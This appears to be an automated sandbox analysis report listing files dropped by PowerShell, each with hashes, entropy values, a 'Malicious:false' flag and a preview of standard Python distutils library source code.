                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2901
                                                                                                                                                                                                            Entropy (8bit):3.9936888188946167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:su0zMXFMw7X/zEwgddFDuqiowgsZSosBEH:l0zCFvbszLwCPEH
                                                                                                                                                                                                            MD5:E0E267254D0EFCF83C88F807CABE39F6
                                                                                                                                                                                                            SHA1:85570BC10FDE012364DC233BCFFA82D36FD96246
                                                                                                                                                                                                            SHA-256:B2799E88D99C99CC5A46798934E4ABCC8220BF8DF3142737553E75082C7262D6
                                                                                                                                                                                                            SHA-512:C726F6C1052A4D0830C98FD6F8FE72963037B9BA857FB69C073E0CD62592EC8F9A6809E4E3BF7059B6E52F537D02C78D62C46395C8C67FF924E39725BA25B1A0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install_data....Implements the Distutils 'install_data' command, for installing..platform-independent data files."""....# contributed by Bastian Kleineidam....import os..from distutils.core import Command..from distutils.util import change_root, convert_path....class install_data(Command):.... description = "install data files".... user_options = [.. ('install-dir=', 'd',.. "base directory for installing data files ".. "(default: installation base dir)"),.. ('root=', None,.. "install everything relative to this alternate root directory"),.. ('force', 'f', "force installation (overwrite existing files)"),.. ].... boolean_options = ['force'].... def initialize_options(self):.. self.install_dir = None.. self.outfiles = [].. self.root = None.. self.force = 0.. self.data_files = self.distribution.data_files.. self.warn_dir = 1.... def finalize_options(self):..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2680
                                                                                                                                                                                                            Entropy (8bit):4.6882325673081935
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:s4D9MqF/rCMQdYXXNOwsOpRc63dwS/sj/KO/PN2ax/PENjR:jD9pF/rC7mXNO/Opz/sOOnN2axnENjR
                                                                                                                                                                                                            MD5:2E1602363B1BE2CAB35EBE18AB8C36DB
                                                                                                                                                                                                            SHA1:2921CA317CAAA147AB8D495DB12151875F569A96
                                                                                                                                                                                                            SHA-256:D4E6034CF73165DED9B07FDD42895900A4AF804B9C8B22013E3BB36204F32B20
                                                                                                                                                                                                            SHA-512:39AD2F3671E10B53083800570DF1923BDF4CA2466D3821D66EA9511F809AE3A1B700AD1A71A63C08B19A4D36CD8D20F2138A4CD236B4FD248381389E0A29B23C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install_egg_info....Implements the Distutils 'install_egg_info' command, for installing..a package's PKG-INFO metadata."""......from distutils.cmd import Command..from distutils import log, dir_util..import os, sys, re....class install_egg_info(Command):.. """Install an .egg-info file for the package""".... description = "Install package's PKG-INFO metadata as an .egg-info file".. user_options = [.. ('install-dir=', 'd', "directory to install to"),.. ].... def initialize_options(self):.. self.install_dir = None.... def finalize_options(self):.. self.set_undefined_options('install_lib',('install_dir','install_dir')).. basename = "%s-%s-py%d.%d.egg-info" % (.. to_filename(safe_name(self.distribution.get_name())),.. to_filename(safe_version(self.distribution.get_version())),.. *sys.version_info[:2].. ).. self.target = os.path.join(self.install_dir, basename).. self.outp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1345
                                                                                                                                                                                                            Entropy (8bit):4.27191853342435
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:HMEZErK7JnMbFoGzQZTA2n59BxJnz5mHbSsHSMUfGdsXUrTULn:sESKlMZbevy7jHSMfdskrq
                                                                                                                                                                                                            MD5:A7C8AADD0EF302C61345CA9987E5EBF6
                                                                                                                                                                                                            SHA1:A7A762BAC82483C1D0A0AC2F27DEC54558CF69ED
                                                                                                                                                                                                            SHA-256:0C1DA5CBE60D24C16CED3725685F387730249E7D840AF929671FF422EC13F0AB
                                                                                                                                                                                                            SHA-512:CCEC090BA6467FE79A9D931A8D87BBC53B9430995E239BCF3BB73DF5C10D003C686435C6DF927A26E6F62656F2D36FE11B11E9F7AEC96DE3D582321D50E903C5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install_headers....Implements the Distutils 'install_headers' command, to install C/C++ header..files to the Python include directory."""....from distutils.core import Command......# XXX force is never used..class install_headers(Command):.... description = "install C/C++ header files".... user_options = [('install-dir=', 'd',.. "directory to install header files to"),.. ('force', 'f',.. "force installation (overwrite existing files)"),.. ].... boolean_options = ['force'].... def initialize_options(self):.. self.install_dir = None.. self.force = 0.. self.outfiles = [].... def finalize_options(self):.. self.set_undefined_options('install',.. ('install_headers', 'install_dir'),.. ('force', 'force'))...... def run(self):.. headers = self.distribution.headers.. if not
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8614
                                                                                                                                                                                                            Entropy (8bit):4.432799438440321
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:maIiCF+vSkwLOEprCbFyBzCz/AuqL9Ehbqm/0wo+UhkJpz8MS20OkOM2kXkI9kR5:mv1Qhw/prq/AuqK8wH5AJULM227A5
                                                                                                                                                                                                            MD5:BCE6FD70A614F6E39E2D8E0FE362B021
                                                                                                                                                                                                            SHA1:B227010157C322F7DFCAFFA8DBA2B2462B7B9E2B
                                                                                                                                                                                                            SHA-256:1A6E059C71D155D82CE25A58E0EE694BBE3B94FC9EC4F55A42691B7818EA8BDB
                                                                                                                                                                                                            SHA-512:2437483D649990A458E2C50EFAFE9BF6DE72CB45E9D1BD5D8FD15DE6647E817478A34B2A24B2C7EBBB452BC771B441EBF1D5FC2AAB55E894A59E635ECB60D223
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install_lib....Implements the Distutils 'install_lib' command..(install all Python modules)."""....import os..import importlib.util..import sys....from distutils.core import Command..from distutils.errors import DistutilsOptionError......# Extension for Python source files...PYTHON_SOURCE_EXTENSION = ".py"....class install_lib(Command):.... description = "install all Python modules (extensions and pure Python)".... # The byte-compilation options are a tad confusing. Here are the.. # possible scenarios:.. # 1) no compilation at all (--no-compile --no-optimize).. # 2) compile .pyc only (--compile --no-optimize; default).. # 3) compile .pyc and "opt-1" .pyc (--compile --optimize).. # 4) compile "opt-1" .pyc only (--no-compile --optimize).. # 5) compile .pyc and "opt-2" .pyc (--compile --optimize-more).. # 6) compile "opt-2" .pyc only (--no-compile --optimize-more).. #.. # The UI for this is two options, 'compile' and 'opti
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2077
                                                                                                                                                                                                            Entropy (8bit):4.383026822329628
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:s2fXzMXFacxHg/TTo1Z+Qhb0OnaHWxfHw:XfXzCFacxFIzHWxfw
                                                                                                                                                                                                            MD5:CE030EF464889B57F9840354F2E75E28
                                                                                                                                                                                                            SHA1:021FD474751F4CF95A616F94BC326DC95EDE40E6
                                                                                                                                                                                                            SHA-256:181A058759E97467F386A77976B6E4788C4230FCC138EB75F8F49018F8223305
                                                                                                                                                                                                            SHA-512:9EA12E89E84618F2470EF7DF8ACC064C131D9AF6780026ED473CA80C19423D848F9BEE25E7B4B68D53A30D89D264802F5D0BFF044E2F8B03713F193F14FAFD91
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.install_scripts....Implements the Distutils 'install_scripts' command, for installing..Python scripts."""....# contributed by Bastian Kleineidam....import os..from distutils.core import Command..from distutils import log..from stat import ST_MODE......class install_scripts(Command):.... description = "install scripts (Python or otherwise)".... user_options = [.. ('install-dir=', 'd', "directory to install scripts to"),.. ('build-dir=','b', "build directory (where to install from)"),.. ('force', 'f', "force installation (overwrite existing files)"),.. ('skip-build', None, "skip the build steps"),.. ].... boolean_options = ['force', 'skip-build'].... def initialize_options(self):.. self.install_dir = None.. self.force = 0.. self.build_dir = None.. self.skip_build = None.... def finalize_options(self):.. self.set_undefined_options('build', ('build_scripts', 'build_dir')).. self.set
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12016
                                                                                                                                                                                                            Entropy (8bit):4.358248460032942
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:cxNiDEw8HNWyGIBFdG82RZ/gEX/PV72rr4M82snZA0kb/56KrKJQAgzEVYk7VDJf:afnFPoZ/irrDsnZtkL56K0QZzGYMV1dx
                                                                                                                                                                                                            MD5:6B2BA18226E1E6C6C5B3B0E3C2F4C09D
                                                                                                                                                                                                            SHA1:6B9B863C6DBB3986460C7EE5E7BD1DFF74AC86F0
                                                                                                                                                                                                            SHA-256:BC2FBB9741E47411E3146BC74A6E7ED7CD1DB79F13CF971BCDD543A8EF071A2A
                                                                                                                                                                                                            SHA-512:C0A1045234A383013AD69FE832FCB2EE754A577D67E1F8130C9CD4BA16FF6F5F3EF04CF94540680C8FEAD63068D79F423B9093051211F8871B763BFBD3DDB9DB
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.register....Implements the Distutils 'register' command (register with the repository)..."""....# created 2002/10/21, Richard user....import getpass..import io..import urllib.parse, urllib.request..from warnings import warn....from distutils.core import PyPIRCCommand..from distutils.errors import *..from distutils import log....class register(PyPIRCCommand):.... description = ("register the distribution with the Python package index").. user_options = PyPIRCCommand.user_options + [.. ('list-classifiers', None,.. 'list the valid Trove classifiers'),.. ('strict', None ,.. 'Will stop the registering if the meta-data are not fully compliant').. ].. boolean_options = PyPIRCCommand.boolean_options + [.. 'verify', 'list-classifiers', 'strict'].... sub_commands = [('check', lambda self: True)].... def initialize_options(self):.. PyPIRCCommand.initialize_options(self).. self.list_classifiers = 0..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):19499
                                                                                                                                                                                                            Entropy (8bit):4.372406433682694
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:kddjDrWlvJMFlL4PyPc/arYhKEtcxiywonYYXhb4U/clJIbRS0KW/X3SBw4G:kddjDqFJKlL4ScCrYhKEtcxUoYhHIbIO
                                                                                                                                                                                                            MD5:56B3314AF07B85F850DDBC97F8295576
                                                                                                                                                                                                            SHA1:971546DA197922C097A190CB880AAE64B87E96D5
                                                                                                                                                                                                            SHA-256:D586E7228021DDFBBBE50108FD69B9CBA828F2222E7DAAF30A660CE93627ED92
                                                                                                                                                                                                            SHA-512:B8211BA9EFA73ABF50E13214D808EF9A1935581C4980BFB98A18228DF7BAD4AE4864AD1686A55FEFA58E8BE047A88F1400401B3BE0C60ED694EC5074B0DCB811
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.command.sdist....Implements the Distutils 'sdist' command (create a source distribution)."""....import os..import sys..from glob import glob..from warnings import warn....from distutils.core import Command..from distutils import dir_util..from distutils import file_util..from distutils import archive_util..from distutils.text_file import TextFile..from distutils.filelist import FileList..from distutils import log..from distutils.util import convert_path..from distutils.errors import DistutilsTemplateError, DistutilsOptionError......def show_formats():.. """Print all possible values for the 'formats' option (used by.. the "--help-formats" command-line option)... """.. from distutils.fancy_getopt import FancyGetopt.. from distutils.archive_util import ARCHIVE_FORMATS.. formats = [].. for format in ARCHIVE_FORMATS.keys():.. formats.append(("formats=" + format, None,.. ARCHIVE_FORMATS[format][2])).. formats.sort().. Fanc
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7836
                                                                                                                                                                                                            Entropy (8bit):4.522295086556487
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:/KOXcsM1FUxandGDPm2EQM+8e+dtwKIUuJQULK7VoaMbygKqLSBIeT1rp8+o:/Uoad2EHvdfIC7VowgXWmeT1raj
                                                                                                                                                                                                            MD5:4E159AE196B4B25316AB8F42725D882C
                                                                                                                                                                                                            SHA1:D197C0D527C9BA6318C00977312DEFE70F4FF1A6
                                                                                                                                                                                                            SHA-256:5CF511C94B67AAF428530AEE9A38079C0DD2FC8261EA11FB45CE5610EA796E54
                                                                                                                                                                                                            SHA-512:13F081756E60B131C8FDF57626902641C0DED3D85C1FF57D228E2C1BE12DFCB24E2AB668C25B34CA2D921AADCB991D0BB9DBED0F9E51CD3CF96071165C641F2C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""..distutils.command.upload....Implements the Distutils 'upload' subcommand (upload package to a package..index)..."""....import os..import io..import hashlib..from base64 import standard_b64encode..from urllib.error import HTTPError..from urllib.request import urlopen, Request..from urllib.parse import urlparse..from distutils.errors import DistutilsError, DistutilsOptionError..from distutils.core import PyPIRCCommand..from distutils.spawn import spawn..from distutils import log......# PyPI Warehouse supports MD5, SHA256, and Blake2 (blake2-256)..# https://bugs.python.org/issue40698.._FILE_CONTENT_DIGESTS = {.. "md5_digest": getattr(hashlib, "md5", None),.. "sha256_digest": getattr(hashlib, "sha256", None),.. "blake2_256_digest": getattr(hashlib, "blake2b", None),..}......class upload(PyPIRCCommand):.... description = "upload binary package to PyPI".... user_options = PyPIRCCommand.user_options + [.. ('sign', 's',.. 'sign files to upload using gpg'),..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4957
                                                                                                                                                                                                            Entropy (8bit):4.314726011420527
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ItCfXAnpDBe299/NYL3Hn8QBkGzYNF/8J6UX6bmxuv0:I0QpDX9NNYL3H/aGzYNF/8J6UqbYuv0
                                                                                                                                                                                                            MD5:02092362C2157C59B6ABB1AA47E453AC
                                                                                                                                                                                                            SHA1:D1F3EC2A4C65EE32CA719377975514D9317F7E87
                                                                                                                                                                                                            SHA-256:5247F4012AC1EFF843C61AC888920A98951594621BD7F98094E207AF1CF5DA41
                                                                                                                                                                                                            SHA-512:2CDA82D4D7C698BA96102A0CB29743B693155BC1675AEDE135CB73093C6FAEC1A38C05955230E737DA9429FA0B4EC1986B4A89CBC64E2E1AB1573A86B3698D51
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.pypirc....Provides the PyPIRCCommand class, the base class for the command classes..that uses .pypirc in the distutils.command package..."""..import os..from configparser import RawConfigParser....from distutils.cmd import Command....DEFAULT_PYPIRC = """\..[distutils]..index-servers =.. pypi....[pypi]..username:%s..password:%s.."""....class PyPIRCCommand(Command):.. """Base command that knows how to handle the .pypirc file.. """.. DEFAULT_REPOSITORY = 'https://upload.pypi.org/legacy/'.. DEFAULT_REALM = 'pypi'.. repository = None.. realm = None.... user_options = [.. ('repository=', 'r',.. "url of repository [default: %s]" % \.. DEFAULT_REPOSITORY),.. ('show-response', None,.. 'display full response text from server')].... boolean_options = ['show-response'].... def _get_rc_file(self):.. """Returns rc file path.""".. return os.path.join(os.path.expanduser('~'), '.pypirc').... def _store_
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9110
                                                                                                                                                                                                            Entropy (8bit):4.548069627020993
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:i8NHiXsEIPXFdunLHjTAYzQvYsEEVNVGQbfl39PlvllyfuYu0TrsqMer7Rkg:i8NQ2PGHRzQTEEZbfltlvMupqVV
                                                                                                                                                                                                            MD5:D15A0F3BF6BDDA13538333953322D17E
                                                                                                                                                                                                            SHA1:499E7D299E6229871430FF3038B4BFD60E0421EF
                                                                                                                                                                                                            SHA-256:D0B9BBF69F0563CFE9F7A446950DB8C9323D8C9BE0685111A5877157BE88A18B
                                                                                                                                                                                                            SHA-512:AB7BDA5F23964AAB95713C69C249110D5CA2AE48900A31C0A890CE71CFCDAA09AB38DB96FAE790219456020DC0F2DACF6206A85CC57EEEB5DFF6C7D33CD979BF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.core....The only module that needs to be imported to use the Distutils; provides..the 'setup' function (which is to be called from the setup script). Also..indirectly provides the Distribution and Command classes, although they are..really defined in distutils.dist and distutils.cmd..."""....import os..import sys....from distutils.debug import DEBUG..from distutils.errors import *....# Mainly import these so setup scripts can "from distutils.core import" them...from distutils.dist import Distribution..from distutils.cmd import Command..from distutils.config import PyPIRCCommand..from distutils.extension import Extension....# This is a barebones help message generated displayed when the user..# runs the setup script with no arguments at all. More useful help..# is generated with various --help options: global help, list commands,..# and per-command help...USAGE = """\..usage: %(script)s [global_opts] cmd1 [cmd1_opts] [cmd2 [cmd2_opts] ...].. or: %(script)s --help [cmd1
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16783
                                                                                                                                                                                                            Entropy (8bit):4.641748116368277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:GbKU4WkV/zkpTak1/maoTgFePW0zxlCSRir1EVjn:jpWktIpJmWe+09MSw1y
                                                                                                                                                                                                            MD5:DB38E6E3A15FEB14556FA951DCC9EE44
                                                                                                                                                                                                            SHA1:46000F6364F8E1A25DC0E5F5F7D3E2C83F9C38B6
                                                                                                                                                                                                            SHA-256:4AE8A63AFDFD3A824CAD5B5F9AA7A9010D56B621E617789F12F0E1CEAB3A51F3
                                                                                                                                                                                                            SHA-512:81709724C3FE515D8643F7975C2C7558436299E84273D1FA74768565B6AC530587CB953EFDEB5DC468A5DFEADB1BCCBED0FF6DBE6B9457BE60286842E4BF59CE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.cygwinccompiler....Provides the CygwinCCompiler class, a subclass of UnixCCompiler that..handles the Cygwin port of the GNU C compiler to Windows. It also contains..the Mingw32CCompiler class which handles the mingw32 port of GCC (same as..cygwin in no-cygwin mode)..."""....# problems:..#..# * if you use a msvc compiled python version (1.5.2)..# 1. you have to insert a __GNUC__ section in its config.h..# 2. you have to generate an import library for its dll..# - create a def-file for python??.dll..# - create an import library using..# dlltool --dllname python15.dll --def python15.def \..# --output-lib libpython15.a..#..# see also http://starship.python.net/crew/kernr/mingw32/Notes.html..#..# * We put export_symbols in a def-file, and don't use..# --export-all-symbols because it doesn't worked reliable in some..# tested configurations. And because other windows compilers also..# need their symbols specified this no se
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144
                                                                                                                                                                                                            Entropy (8bit):4.920350705141286
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:JSxrfZhsQhgXFuLc1FKRpxRIVRjSAUGFYxv2nV6SWhGOhgXCB:arfE0gVuTR5IVQgFYR2nV6Zgq
                                                                                                                                                                                                            MD5:64C560EA2A1F8F7E9095D53C60DD7097
                                                                                                                                                                                                            SHA1:E3845A3E58F2F6192FE6129C22303A46A94C013C
                                                                                                                                                                                                            SHA-256:379D7EF4117C46A2B9C4E1ED2F713D6FA371B78966D4EC4FF0251CF5A97DF4FA
                                                                                                                                                                                                            SHA-512:A98DF9F522F57C95AA94103EBD72C30778F0123A27EDC0C55AA23DCE713C674DBF48C63319A57159C1740B507CD55F53E345A5C3B38232C0F821D729EF04DA78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:import os....# If DISTUTILS_DEBUG is anything other than the empty string, we run in..# debug mode...DEBUG = os.environ.get('DISTUTILS_DEBUG')..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3583
                                                                                                                                                                                                            Entropy (8bit):4.466821371875149
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:KD7jhgu7MklSVMwSJyVcSR7YdOEEKofR/pLRby5kZ3g:KDJgu7MIsXWQ0dzGJHbIk6
                                                                                                                                                                                                            MD5:9950D9914FD4C0D3C929F2A151C5E120
                                                                                                                                                                                                            SHA1:ED6C6B2F0D691D11B57D3A1187140A3DB684D9D9
                                                                                                                                                                                                            SHA-256:EED48F4538531E8707BA4F38346BD82D458EA969B7C75FE9B5076CA302BB3449
                                                                                                                                                                                                            SHA-512:698DC8BF254F2023FD5F114CB339983A67C56F2078B68F7F5B1986B62C88FD2A0F0A18A881C92032CC26E203CBB06C9C0796A901D517281D0254070D9CE5D5C6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.dep_util....Utility functions for simple, timestamp-based dependency of files..and groups of files; also, function based entirely on such..timestamp dependency analysis."""....import os..from distutils.errors import DistutilsFileError......def newer (source, target):.. """Return true if 'source' exists and is more recently modified than.. 'target', or if 'source' exists and 'target' doesn't. Return false if.. both exist and 'target' is the same age or younger than 'source'... Raise DistutilsFileError if 'source' does not exist... """.. if not os.path.exists(source):.. raise DistutilsFileError("file '%s' does not exist" %.. os.path.abspath(source)).. if not os.path.exists(target):.. return 1.... from stat import ST_MTIME.. mtime1 = os.stat(source)[ST_MTIME].. mtime2 = os.stat(target)[ST_MTIME].... return mtime1 > mtime2....# newer ()......def newer_pairwise (sources, targets):.. """Walk two f
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7988
                                                                                                                                                                                                            Entropy (8bit):4.485950000716289
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:TypTvhqPueHrLeBZ4+wKP2rWqWVWkKNG7dE+WgaUgO6F7eaOWI7xvyl6MyHAnbYL:pWeLLOGm2iBWPk+vO6F7IxBM4kYmUwy
                                                                                                                                                                                                            MD5:6D6921CFB9AB1E64A7D8C56137148361
                                                                                                                                                                                                            SHA1:EE66B3E97EC14B52EF2D381DCA5432945E918542
                                                                                                                                                                                                            SHA-256:CD5F2BF3CA6D55AC935BBDBD095EA56FC56EDE2466CE058EAFA6BAA72590E867
                                                                                                                                                                                                            SHA-512:EE52E22D1EB1DDDE34D52857AD0C4561A97F444197CC910088AA7136B0394511E67E933D924B24D6F4F9514401AC03A9B7955ABCFE74C0B009F124DA175ACDE2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.dir_util....Utility functions for manipulating directories and directory trees."""....import os..import errno..from distutils.errors import DistutilsFileError, DistutilsInternalError..from distutils import log....# cache for by mkpath() -- in addition to cheapening redundant calls,..# eliminates redundant "creating /foo/bar/baz" messages in dry-run mode.._path_created = {}....# I don't use os.makedirs because a) it's new to Python 1.5.2, and..# b) it blows up if the directory already exists (I want to silently..# succeed in that case)...def mkpath(name, mode=0o777, verbose=1, dry_run=0):.. """Create a directory and any missing ancestor directories..... If the directory already exists (or if 'name' is the empty string, which.. means the current directory, which of course exists), then do nothing... Raise DistutilsFileError if unable to create some directory along the way.. (eg. some sub-path exists, but is a file rather than a directory)... If 'verbose' is
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):51641
                                                                                                                                                                                                            Entropy (8bit):4.400395030858495
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:bL1q20UEGVrig/jqPXRy9BFJ+1b2TywlYwiAipWDl7g+PbIH1A09Ti9t6muyTmjl:bLM20pGVrlmPXRyP5krVSZg
                                                                                                                                                                                                            MD5:10D4051283309BC31E24BC369243830A
                                                                                                                                                                                                            SHA1:CFAE691888EA2A55F0BB822B3170EA647B27A472
                                                                                                                                                                                                            SHA-256:F5753C16A0CA078F18FD05D6834F95CD594EB48C666E929C0A20F85F316DD2B5
                                                                                                                                                                                                            SHA-512:248CBFC7E4924D20DF20BF6379DBD930861B79F75FABD534E5072295F177EF88F3FFCF46F065123537B12FAB9BD1C617469D4753D8EAF1E0100DD23341743137
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.dist....Provides the Distribution class, which represents the module distribution..being built/installed/distributed..."""....import sys..import os..import re..from email import message_from_file....try:.. import warnings..except ImportError:.. warnings = None....from distutils.errors import *..from distutils.fancy_getopt import FancyGetopt, translate_longopt..from distutils.util import check_environ, strtobool, rfc822_escape..from distutils import log..from distutils.debug import DEBUG....# Regex to define acceptable Distutils command names. This is not *quite*..# the same as a Python NAME -- I don't allow leading underscores. The fact..# that they're very similar is no coincidence; the default naming scheme is..# to look for a Python module named after the command...command_re = re.compile(r'^[a-zA-Z]([a-zA-Z0-9_]*)$')......def _ensure_list(value, fieldname):.. if isinstance(value, str):.. # a string containing comma separated values is okay. It will..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3674
                                                                                                                                                                                                            Entropy (8bit):4.6292303890474145
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:QI2mgfuFscN9h1e2pRuSKzAdxI0T1izyE:QI2ZfT4c+Eh
                                                                                                                                                                                                            MD5:9251870C4788C056BBFDCEE1CA612723
                                                                                                                                                                                                            SHA1:7E9620CC4BA6C399EDA2DB75FE3C6AAB81ECFB68
                                                                                                                                                                                                            SHA-256:CABD7EC5BB0F0A2A830CC01865523DE6E12E77B3F7834EED6C0E9C4EE2CDCCA3
                                                                                                                                                                                                            SHA-512:4A96C8132378D451AE86BACA0D831A073D749CF998F2F978A93E65ECE04C4487047715AE7C8C1DD4602CA4BECC3084AC2744EF106BBD8F699C35E4ABCE27C1FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:"""distutils.errors....Provides exceptions used by the Distutils modules. Note that Distutils..modules may raise standard exceptions; in particular, SystemExit is..usually raised for errors that are obviously the end-user's fault..(eg. bad command-line arguments).....This module is safe to use in "from ... import *" mode; it only exports..symbols whose names start with "Distutils" and end with "Error"."""....class DistutilsError (Exception):.. """The root of all Distutils evil.""".. pass....class DistutilsModuleError (DistutilsError):.. """Unable to load an expected module, or to find an expected class.. within some module (in particular, command modules and classes).""".. pass....class DistutilsClassError (DistutilsError):.. """Some command class (or possibly distribution class, if anyone.. feels a need to subclass Distribution) is found not to be holding.. up its end of the bargain, ie. implementing some part of the.. "command "interface.""".. pass....c
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10770
                                                                                                                                                                                                            Entropy (8bit):4.294906707400846
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:CtMtQKU2bSzTrHD0w+t91G7gxv9P93Kp95rMeYiSDslsz2ms/kjbK6IzyNC8+dqB:CKObjAwM9vlIqivDQFOqVZGDpo2mTZ
